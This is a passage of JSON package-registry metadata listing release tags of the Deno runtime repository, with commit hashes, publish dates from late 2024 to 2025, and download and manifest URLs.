/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/de